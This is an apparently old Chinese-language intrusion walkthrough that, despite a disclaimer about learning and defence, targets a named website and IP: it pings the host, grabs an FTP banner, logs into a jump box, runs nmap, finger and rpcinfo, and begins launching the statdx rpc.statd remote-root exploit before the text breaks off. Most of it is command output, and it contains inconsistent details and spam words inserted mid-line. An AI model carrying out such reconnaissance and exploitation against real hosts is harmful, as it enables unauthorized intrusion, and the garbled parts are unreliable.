此文的目的不在于教人入侵,而是为了提高自身的技术和加强网络管理员的攻击而进行的。
首先确定目标,假设是:www.uc955.com
先让俺看看是不是连得上:
以下是引用片段:
C:\pingwww.uc955.com
Pingingwww.uc955.com[202.106.184.200]with32bytesofdata:
Replyfrom202.106.184.200:bytes=32time=541msTTL=244
Replyfrom202.106.184.200:bytes=32time=620msTTL=244
Replyfrom202.106.184.200:bytes=32time=651msTTL=244
Replyfrom202.106.184.200:bytes=32time=511msTTL=244
Pingstatistic单机传奇or202.106.184.200:
Packets:Sent=4,Received=4,Lost=0(0%loss),
Approximateroundtriptimesinmilli-seconds:
Minimum=511ms,Maximum=651ms,Average=580ms
嘻嘻—不但连得上,速度还不错……
先telnet看看banner:
C:\>telnetwww.uc955.com
遗失对主机的连接。
再试试ftp,
以下是引用片段:
C:\>ftpwww.uc955.com
Connectedtowww.fbi.gov.tw.
220XXX-wwwFTPserver(Versionwu-2.6.1(1)WedAug905:54:50EDT2000)ready.
User(www.uc955.com:(none)):
wu-2.6.1看来有点眉目了。这台机器像是RedHat7.0!首先必须确认一下,连上俺的跳板:
以下是引用片段:
C:\>telnetxxx.xxx.xxx.xxx
RedHatLinuxrelease7.0(Guinness)
Kernel2.2.16-22smponani686
login:fetdog
Password:
bash-2.04$
拿nmap扫描器,看看其中的奥妙~~~
以下是引用片段:
bash-2.04$nmap-sT-Owww.uc955.com
StartingnmapV.2.54BETA7(www.insecure.org/nmap/)
WARNING!Thefollowingfilesexistandarereadable:/usr/local/sha
-servicesand./nmap-services.Iamchoosing/usr/local/share/nmap/
单机传奇orsecurityreasons.setNMAPDIR=.togiveprioritytofilesin
irectory
Interestingportson(www.uc955.com):
(The1520portsscannedbutnotshownbelowareinstate:closed)
PortStateService
25/tcpopensmtp
79/tcpopenfinger
80/tcpopenhttp
111/tcpopensunrpc
113/tcpopenauth
443/tcpopenhttps
513/tcpopenlogin
514/tcpopenshell
515/tcpopenprinter
587/tcpopensubmission
1024/tcpopenkdm
TCPSequencePrediction:Class=randompositiveincrements
Difficulty=3247917(Goodluck!)
Remoteoperatingsystemguessinux2.1.122-2.2.16
Nmapruncompleted--1IPaddress(1hostup)scannedin9seconds
打开的端口还挺多,这意味着入侵的可能性增加。79/tcpopenfinger,先看看这个,不过linux没有finger用户列表这个漏洞。
以下是引用片段:
[url=mailto:bash-2.04$finger@www.uc955.com]bash-2.04$finger@www.uc955.com[/url]
[www.uc955.com]
Nooneloggedon.
再看看111/tcpopensunrpc。近来rpc漏洞风行,不知道RH7这个东东会不会有?先看看再说!
以下是引用片段:
bash-2.04$rpcinfo-pwww.uc955.com
programversprotoportservice
1000002tcp111rpcbind
1000002udp111rpcbind
1000211udp1024nlockmgr
1000213udp1024nlockmgr
1000241udp1025status
1000241tcp1024status
看来有rpc.statd服务。来看看能不能远程溢出拿个rootshell。
以下是引用片段:
bash-2.04$./statdx-h
statdxbyron1n
Usage:stat[-t][-pport][-aaddr][-llen]
[-ooffset][-wnum][-ssecs][-dtype]
-tattackatcpdispatcher[udp]
|